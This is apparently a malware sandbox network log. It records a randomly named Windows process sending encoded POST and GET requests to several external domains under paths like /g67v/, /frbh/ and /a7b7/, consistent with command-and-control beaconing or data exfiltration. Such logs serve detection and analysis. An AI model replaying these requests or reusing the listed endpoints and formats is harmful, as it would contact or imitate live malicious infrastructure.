                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.jl800.vip
                                                          Origin: http://www.jl800.vip
                                                          Referer: http://www.jl800.vip/g67v/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 52 2b 6b 62 74 47 42 48 71 63 4a 72 2b 54 77 71 6b 67 76 77 4a 30 53 74 6f 55 4d 7a 2f 33 47 59 74 2f 4e 59 56 66 57 35 45 6a 37 65 52 44 63 39 46 4c 2f 6f 4a 71 56 65 49 41 6e 65 30 6c 76 32 43 6b 38 44 6e 45 74 2f 50 69 37 57 6d 79 36 67 69 2f 50 4d 61 49 51 37 6a 41 67 76 2f 31 34 5a 39 4f 64 54 77 50 63 41 6b 55 69 47 65 38 44 37 2f 36 5a 42 43 56 78 57 77 44 67 35 73 36 6a 5a 4a 53 4d 78 33 46 52 42 78 4e 4f 4d 63 4d 74 54 55 74 7a 6e 55 55 4e 69 49 33 49 5a 6d 76 34 50 74 54 77 66 32 79 71 32 65 78 48 6f 53 2b 57 69 37 43 4a 6a 50 58 52 2f 31 2b 66 34 64 42 74 2f 43 6f 46 64 55 63 69 4b 61 54 6e 61
                                                          Data Ascii: GBbljTO=R+kbtGBHqcJr+TwqkgvwJ0StoUMz/3GYt/NYVfW5Ej7eRDc9FL/oJqVeIAne0lv2Ck8DnEt/Pi7Wmy6gi/PMaIQ7jAgv/14Z9OdTwPcAkUiGe8D7/6ZBCVxWwDg5s6jZJSMx3FRBxNOMcMtTUtznUUNiI3IZmv4PtTwf2yq2exHoS+Wi7CJjPXR/1+f4dBt/CoFdUciKaTna
                                                          Jul 2, 2024 14:03:47.009485960 CEST | 778 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 02 Jul 2024 12:03:46 GMT
                                                          Content-Type: application/json;charset=utf8;
                                                          Content-Length: 62
                                                          Connection: close
                                                          Set-Cookie: http_waf_cookie=1b05255d-27fe-4447881929ccafd91ea432e9c2bb42f5bca3; Expires=1719929026; Path=/; HttpOnly
                                                          Set-Cookie: acw_tc=ac11000117199218268692356e01950a25397ec8fe62da97f66a8b133c9019;path=/;HttpOnly;Max-Age=1800
                                                          jckl: ExjRz0vWW3MUIJzauHFEupm7E/3gUrE5am7cX2LSfrNBkRjx+COrJ5W1+ccHQCqhIBU+esdygAcYE2qXizwj8g==
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                                          Via: 1.1 google
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          X-Request-Id: 1e8799fb41b30dab797806891377face
                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d
                                                          Data Ascii: {"status": "6001","msg": "fail","result":""}


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          10 | 192.168.2.6 | 49732 | 38.47.158.215 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 2, 2024 14:03:48.731627941 CEST | 761 | OUT | POST /g67v/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.jl800.vip
                                                          Origin: http://www.jl800.vip
                                                          Referer: http://www.jl800.vip/g67v/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 52 2b 6b 62 74 47 42 48 71 63 4a 72 2f 33 4d 71 68 42 76 77 49 55 53 75 6a 30 4d 7a 31 58 47 45 74 2f 42 59 56 62 6d 70 45 56 4c 65 52 69 4d 39 45 50 72 6f 4f 71 56 65 61 67 6e 66 35 46 76 39 43 6b 77 4c 6e 47 70 2f 50 6b 58 57 6d 33 47 67 69 4d 33 4e 56 34 51 35 36 51 67 74 79 56 34 5a 39 4f 64 54 77 50 49 6d 6b 55 36 47 66 4e 54 37 2b 59 78 43 42 56 78 56 33 44 67 35 37 4b 6a 56 4a 53 4e 65 33 46 68 37 78 4f 6d 4d 63 49 70 54 54 38 7a 6b 50 6b 4e 37 58 6e 49 4b 6d 71 46 2b 68 53 45 61 2f 52 48 54 50 52 62 64 54 49 58 34 6e 78 4a 41 64 48 78 39 31 38 48 4b 64 68 74 56 41 6f 39 64 47 4c 75 74 56 6e 43 35 42 62 4b 56 6d 38 41 4c 42 68 34 34 6d 4c 7a 30 65 43 44 73 56 51 3d 3d
                                                          Data Ascii: GBbljTO=R+kbtGBHqcJr/3MqhBvwIUSuj0Mz1XGEt/BYVbmpEVLeRiM9EProOqVeagnf5Fv9CkwLnGp/PkXWm3GgiM3NV4Q56QgtyV4Z9OdTwPImkU6GfNT7+YxCBVxV3Dg57KjVJSNe3Fh7xOmMcIpTT8zkPkN7XnIKmqF+hSEa/RHTPRbdTIX4nxJAdHx918HKdhtVAo9dGLutVnC5BbKVm8ALBh44mLz0eCDsVQ==
                                                          Jul 2, 2024 14:03:49.550014973 CEST | 778 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 02 Jul 2024 12:03:49 GMT
                                                          Content-Type: application/json;charset=utf8;
                                                          Content-Length: 62
                                                          Connection: close
                                                          Set-Cookie: http_waf_cookie=dff3a11d-3df4-40a4006acabde96a2db8741ec1c8444f3dd0; Expires=1719929029; Path=/; HttpOnly
                                                          Set-Cookie: acw_tc=ac11000117199218293966935e009b8945be4087883cee6c2ae4ede6631cd8;path=/;HttpOnly;Max-Age=1800
                                                          jckl: kpPsYwEN3PnFDN6vJqtT4CHpIEACpwSkhVKj9+V/M/t3v9k0GCv/wtf5Pa51Kg6u0CR/q5D+CCjLy7mWkkKsyg==
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                                          Via: 1.1 google
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          X-Request-Id: 9dcfd32e20158cd532d7327bafff7cac
                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d
                                                          Data Ascii: {"status": "6001","msg": "fail","result":""}


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          11 | 192.168.2.6 | 49733 | 38.47.158.215 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 2, 2024 14:03:51.263981104 CEST | 1774 | OUT | POST /g67v/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.jl800.vip
                                                          Origin: http://www.jl800.vip
                                                          Referer: http://www.jl800.vip/g67v/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 52 2b 6b 62 74 47 42 48 71 63 4a 72 2f 33 4d 71 68 42 76 77 49 55 53 75 6a 30 4d 7a 31 58 47 45 74 2f 42 59 56 62 6d 70 45 57 72 65 52 56 4d 39 46 75 72 6f 50 71 56 65 5a 67 6e 61 35 46 76 67 43 6b 59 31 6e 47 31 4a 50 68 4c 57 6e 52 53 67 6b 39 33 4e 43 6f 51 35 79 77 67 6f 2f 31 34 32 39 4f 4e 70 77 50 59 6d 6b 55 36 47 66 4f 37 37 2b 4b 5a 43 48 56 78 57 77 44 67 39 73 36 6a 35 4a 53 6b 70 33 45 56 72 78 2b 47 4d 64 73 4e 54 56 4f 4c 6b 44 6b 4e 75 55 6e 4a 58 6d 71 42 6c 68 53 70 6a 2f 51 79 32 50 51 6a 64 66 73 6d 45 34 43 4a 38 47 42 74 36 6b 63 4c 71 61 48 5a 63 46 65 31 2f 41 61 71 59 63 6a 65 35 4b 38 47 73 73 2b 31 37 4a 6e 4e 57 74 76 6a 6c 64 7a 36 36 42 36 47 73 4a 6f 49 62 4f 53 64 65 4c 71 64 75 42 52 37 78 4e 67 36 2f 33 32 2b 79 63 69 45 4f 6c 52 45 7a 6a 4e 56 43 77 67 72 74 61 31 31 6f 79 5a 5a 56 6c 54 6b 57 67 61 35 2f 79 64 48 48 4b 4b 44 6e 54 43 2b 57 42 5a 38 6a 39 74 38 47 6f 61 44 4e 4a 6b 58 7a 46 44 63 45 55 4c 6e 55 69 48 35 6f 6e 67 58 55 54 5a [TRUNCATED]
                                                          Data Ascii: GBbljTO=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 [TRUNCATED]


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          12 | 192.168.2.6 | 49734 | 38.47.158.215 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 2, 2024 14:03:53.795146942 CEST | 479 | OUT | GET /g67v/?mB=rL4lP&GBbljTO=c8M7uxZhudpInUsrkR2DFEXxpEFo+k2F1tpwZ/KeEHHRQR8ISdL3H7dZekm83GXANV8iiloQGx74ti2jjfGNAYcI3yUU4CBSy8RpmuksmnDwDcPq/qJ2CnRI4iJcuZj+GnE/ihc= HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.jl800.vip
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Jul 2, 2024 14:03:54.622292042 CEST | 778 | IN | HTTP/1.1 200 OK
                                                          Date: Tue, 02 Jul 2024 12:03:54 GMT
                                                          Content-Type: application/json;charset=utf8;
                                                          Content-Length: 62
                                                          Connection: close
                                                          Set-Cookie: http_waf_cookie=667bde18-f8ff-48dc4397b3eeecd0a1a10e7eaa2b6f5fec5b; Expires=1719929034; Path=/; HttpOnly
                                                          Set-Cookie: acw_tc=ac11000117199218344752210e01975ead3549bc6260b9708aa2d5c41a46ce;path=/;HttpOnly;Max-Age=1800
                                                          jckl: XleUEhsciTB26Iz8yOSRqW+XQz3zJfF4GxXFCElsZyPqND3PLfO8oPi0MGZrhViWEqUS2RGYemgTC0t9DshQNw==
                                                          X-Content-Type-Options: nosniff
                                                          X-XSS-Protection: 1
                                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                                          Via: 1.1 google
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          X-Request-Id: 86f8bd71800cd79dc840d73e54eafc14
                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d
                                                          Data Ascii: {"status": "6001","msg": "fail","result":""}


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          13 | 192.168.2.6 | 49735 | 3.33.130.190 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 2, 2024 14:03:59.661139011 CEST | 764 | OUT | POST /frbh/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.theridleysuk.co.uk
                                                          Origin: http://www.theridleysuk.co.uk
                                                          Referer: http://www.theridleysuk.co.uk/frbh/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 4e 5a 53 50 71 31 61 54 2b 42 62 57 49 38 4a 6a 62 62 4e 44 70 49 4e 55 53 56 46 55 6e 6a 2f 4b 32 2f 4a 6a 52 67 4c 30 62 78 7a 4e 68 41 4b 74 4b 6c 61 59 58 2b 68 75 6d 6d 31 48 42 47 31 75 70 78 71 48 68 71 4b 68 70 56 44 35 49 6e 49 62 6c 79 62 4c 73 43 6e 70 6b 4b 50 64 5a 77 6d 42 46 47 42 44 66 56 54 50 31 39 4a 6b 72 2b 2f 53 4e 76 63 4f 33 53 79 6a 51 6b 6f 4d 4d 56 56 38 43 47 47 46 48 48 76 5a 37 42 45 38 65 5a 44 32 41 34 59 49 78 4d 53 4b 5a 68 4c 42 6e 63 32 66 33 61 34 48 53 46 48 61 53 73 56 63 57 4b 66 68 68 75 46 68 4a 70 39 75 52 53 54 78 75 77 5a 46 31 36 78 6d 34 67 63 38 48 6f 4b 37
                                                          Data Ascii: GBbljTO=NZSPq1aT+BbWI8JjbbNDpINUSVFUnj/K2/JjRgL0bxzNhAKtKlaYX+humm1HBG1upxqHhqKhpVD5InIblybLsCnpkKPdZwmBFGBDfVTP19Jkr+/SNvcO3SyjQkoMMVV8CGGFHHvZ7BE8eZD2A4YIxMSKZhLBnc2f3a4HSFHaSsVcWKfhhuFhJp9uRSTxuwZF16xm4gc8HoK7


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          14 | 192.168.2.6 | 49736 | 3.33.130.190 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 2, 2024 14:04:02.203135967 CEST | 788 | OUT | POST /frbh/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.theridleysuk.co.uk
                                                          Origin: http://www.theridleysuk.co.uk
                                                          Referer: http://www.theridleysuk.co.uk/frbh/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 4e 5a 53 50 71 31 61 54 2b 42 62 57 49 63 5a 6a 49 4d 5a 44 76 6f 4e 58 4d 46 46 55 70 7a 2f 30 32 2f 46 6a 52 68 2f 6b 62 6a 6e 4e 67 67 36 74 4c 6b 61 59 55 2b 68 75 74 47 31 65 4f 6d 31 66 70 78 6d 50 68 72 6d 68 70 56 48 35 49 6e 59 62 77 52 7a 55 73 53 6e 76 74 71 50 62 45 41 6d 42 46 47 42 44 66 56 58 68 31 39 42 6b 72 74 6e 53 66 36 77 50 72 43 79 6b 47 55 6f 4d 64 46 56 67 43 47 47 37 48 47 79 2b 37 43 38 38 65 59 7a 32 41 4e 30 4c 6b 63 53 49 64 68 4b 46 33 64 76 33 34 72 4e 63 64 32 66 58 54 75 78 66 58 38 65 37 39 64 46 43 62 35 64 73 52 51 4c 44 75 51 5a 76 33 36 4a 6d 71 33 51 62 49 63 76 59 2b 43 6a 37 69 35 69 34 5a 6c 63 35 72 5a 78 30 31 62 70 6e 77 77 3d 3d
                                                          Data Ascii: GBbljTO=NZSPq1aT+BbWIcZjIMZDvoNXMFFUpz/02/FjRh/kbjnNgg6tLkaYU+hutG1eOm1fpxmPhrmhpVH5InYbwRzUsSnvtqPbEAmBFGBDfVXh19BkrtnSf6wPrCykGUoMdFVgCGG7HGy+7C88eYz2AN0LkcSIdhKF3dv34rNcd2fXTuxfX8e79dFCb5dsRQLDuQZv36Jmq3QbIcvY+Cj7i5i4Zlc5rZx01bpnww==


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          15 | 192.168.2.6 | 49737 | 3.33.130.190 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 2, 2024 14:04:04.733908892 CEST | 1801 | OUT | POST /frbh/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.theridleysuk.co.uk
                                                          Origin: http://www.theridleysuk.co.uk
                                                          Referer: http://www.theridleysuk.co.uk/frbh/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 4e 5a 53 50 71 31 61 54 2b 42 62 57 49 63 5a 6a 49 4d 5a 44 76 6f 4e 58 4d 46 46 55 70 7a 2f 30 32 2f 46 6a 52 68 2f 6b 62 6a 66 4e 67 54 79 74 4a 44 6d 59 62 65 68 75 78 57 31 44 4f 6d 31 34 70 78 4f 4c 68 72 36 58 70 51 62 35 49 46 67 62 30 51 7a 55 6e 53 6e 76 79 36 50 65 5a 77 6d 75 46 47 78 66 66 56 48 68 31 39 42 6b 72 73 58 53 63 76 63 50 37 79 79 6a 51 6b 6f 51 4d 56 56 45 43 47 75 4e 48 47 33 4a 37 79 63 38 65 34 6a 32 54 72 41 4c 6c 38 53 57 61 68 4b 6a 33 64 54 6f 34 72 68 51 64 31 43 38 54 74 74 66 58 36 76 69 74 38 35 38 4f 36 46 52 44 68 72 35 71 33 46 74 79 35 4a 34 76 6d 4d 52 41 4e 43 36 35 58 66 53 70 4a 72 56 58 6a 73 72 6b 63 67 36 77 62 78 69 75 38 58 73 63 77 2f 75 58 6d 65 6c 76 4c 70 6b 31 6e 44 2f 68 52 70 7a 67 57 65 4c 43 58 6b 4a 51 70 57 6b 68 79 32 4e 6b 2f 77 6b 76 45 79 34 54 67 48 4d 48 47 55 33 34 36 2b 30 4d 53 47 41 73 79 77 4e 34 56 47 37 76 77 65 6f 30 78 6d 6b 6e 6e 71 6d 31 66 64 6e 70 6b 35 72 73 67 33 31 44 44 42 31 61 37 6e 56 44 64 [TRUNCATED]
                                                          Data Ascii: GBbljTO=NZSPq1aT+BbWIcZjIMZDvoNXMFFUpz/02/FjRh/kbjfNgTytJDmYbehuxW1DOm14pxOLhr6XpQb5IFgb0QzUnSnvy6PeZwmuFGxffVHh19BkrsXScvcP7yyjQkoQMVVECGuNHG3J7yc8e4j2TrALl8SWahKj3dTo4rhQd1C8TttfX6vit858O6FRDhr5q3Fty5J4vmMRANC65XfSpJrVXjsrkcg6wbxiu8Xscw/uXmelvLpk1nD/hRpzgWeLCXkJQpWkhy2Nk/wkvEy4TgHMHGU346+0MSGAsywN4VG7vweo0xmknnqm1fdnpk5rsg31DDB1a7nVDdfrnX2Qzj9ulgXVylTnPJrx27drtqN8/Pfr530ZhovnHE8RSKJPd08YhGAxQo+aPUjVGz0/bLQGuvWZPiJog/3+VbCnBQSCVjizFUoZcG66kip+OyGhgYDxGGgKYwMkke8x7v1nIgqs1NJX+og/b534j0sXy3Zy1BW4xJpcFJNkt1parizCwYsP9UqHYD9Oi62Ja1OEBmqdqTcQEeAEcSogJd9RdYBoOYduASybDSfFnsK0z5ohCa0HKF0/n0Ma4wvC5y02R+mADQwWz8rczgQX0qbktfFhpbmik5cjkkGKQ9C+Fga8s5jPzoZ74/HUHFc3r33AyFkbxtBDrUzEFPavyqtPgsiiLLVvT3Qxl9fhQfQjpDxc7xXJWi4kmUPJJtBYe3PY+6MUUdItX/OGC9D7jccdvU3r2HLAZbhUecDTQEM4Qb40EXFNlgzGjiBqyL7q8e9w9bedj9rlEQCQT3UG1ouUIGOKH9CoXDnVmx7frqnBAypRxaQRs26FNCNhlYizJm4McO5TtS3HjYjv2t4rJwqi0yFvQy1g+/mG3BSADWOOxHQgWcCMFjMZLX6z/3GadwmArFigUJPEamVegqQiH85Y4jkjNzMZgjHO8Rru5uxVzln0JRw2etFgKReWt6kkQEi/TrWphyAZFreve4htbyAz22s9xLdM [TRUNCATED]


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          16 | 192.168.2.6 | 49738 | 3.33.130.190 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 2, 2024 14:04:07.263535976 CEST | 488 | OUT | GET /frbh/?GBbljTO=Ab6vpDSK2Brwe75JZoMyqaMvDHsAkCPA2P9OUDXWAzTXqR+fdlaTQvVfgW4hOBJepAqkmb7wk13CIWkS+xjXxgvfntXYbzbMYjBsDXbn2M5yrvr+d9Np/nCfHBQ0eV5fDAaNGRM=&mB=rL4lP HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.theridleysuk.co.uk
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Jul 2, 2024 14:04:07.741681099 CEST | 408 | IN | HTTP/1.1 200 OK
                                                          Server: openresty
                                                          Date: Tue, 02 Jul 2024 12:04:07 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 268
                                                          Connection: close
                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GBbljTO=Ab6vpDSK2Brwe75JZoMyqaMvDHsAkCPA2P9OUDXWAzTXqR+fdlaTQvVfgW4hOBJepAqkmb7wk13CIWkS+xjXxgvfntXYbzbMYjBsDXbn2M5yrvr+d9Np/nCfHBQ0eV5fDAaNGRM=&mB=rL4lP"}</script></head></html>


                                                          Session ID: 17 | Source IP: 192.168.2.6 | Source Port: 49740 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 280 | Process: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp: Jul 2, 2024 14:04:12.790901899 CEST | Bytes transferred: 770 | Direction: OUT | Data: POST /a7b7/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.dexiangovernment.org
                                                          Origin: http://www.dexiangovernment.org
                                                          Referer: http://www.dexiangovernment.org/a7b7/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Ascii: GBbljTO=bDHBL+M9crTD4/ozl4BbL+FsxpSJAY0LF1u4c3VON7LZujNxnGSXyBcagvyD1DQpnreZWGlLcVqEo4uQcM/8qNVlyff6yaS1jd30kOGzQ/LFXsmPv4KutnW20tpcsUs0yaRACffUq00LDbZaigW0UYTjNuhu+dHpMIXDNeZZdaU+INomuGHoz5Vpg7Bh//UwVyO9iwUzbrG5


                                                          Session ID: 18 | Source IP: 192.168.2.6 | Source Port: 49741 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 280 | Process: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp: Jul 2, 2024 14:04:15.330939054 CEST | Bytes transferred: 794 | Direction: OUT | Data: POST /a7b7/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.dexiangovernment.org
                                                          Origin: http://www.dexiangovernment.org
                                                          Referer: http://www.dexiangovernment.org/a7b7/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Ascii: GBbljTO=bDHBL+M9crTD+fYzo5BbauFrtZSJSY0PFym4cy0DNObZuGpxmHSXhxcaoPyaozQynrTkWCtLcV+Eo5eQc9//odVj6/f42aS1jd30kOCZQ/DFXf+Pg6ytkHW18Npc9EswyaRYCeC5q2MLDZRaj0KzDoSJCOgiwYnjFaneKNt9CoobAbp8y1HLhp1rg5ZT/fUaXy29wnYUUfjaP/sz+n6r7p0U6aIOtcdaTw==


                                                          Session ID: 19 | Source IP: 192.168.2.6 | Source Port: 49742 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 280 | Process: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp: Jul 2, 2024 14:04:17.874100924 CEST | Bytes transferred: 1807 | Direction: OUT | Data: POST /a7b7/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.dexiangovernment.org
                                                          Origin: http://www.dexiangovernment.org
                                                          Referer: http://www.dexiangovernment.org/a7b7/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Ascii: GBbljTO= [TRUNCATED]


                                                          Session ID: 20 | Source IP: 192.168.2.6 | Source Port: 49743 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 280 | Process: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp: Jul 2, 2024 14:04:20.406029940 CEST | Bytes transferred: 490 | Direction: OUT | Data: GET /a7b7/?mB=rL4lP&GBbljTO=WBvhIJsiSZ/Mpf8vspJrW/4pjpLKDJYga2inWWxcAarnmjt55lmBuwg8tb7lhDgj0p/kM0sabX/Eh7nxTer92pVV4vHw9Nn4rOH01OSzROy3Dd2AlIGGpSa7+8s++24x8ediPqQ= HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.dexiangovernment.org
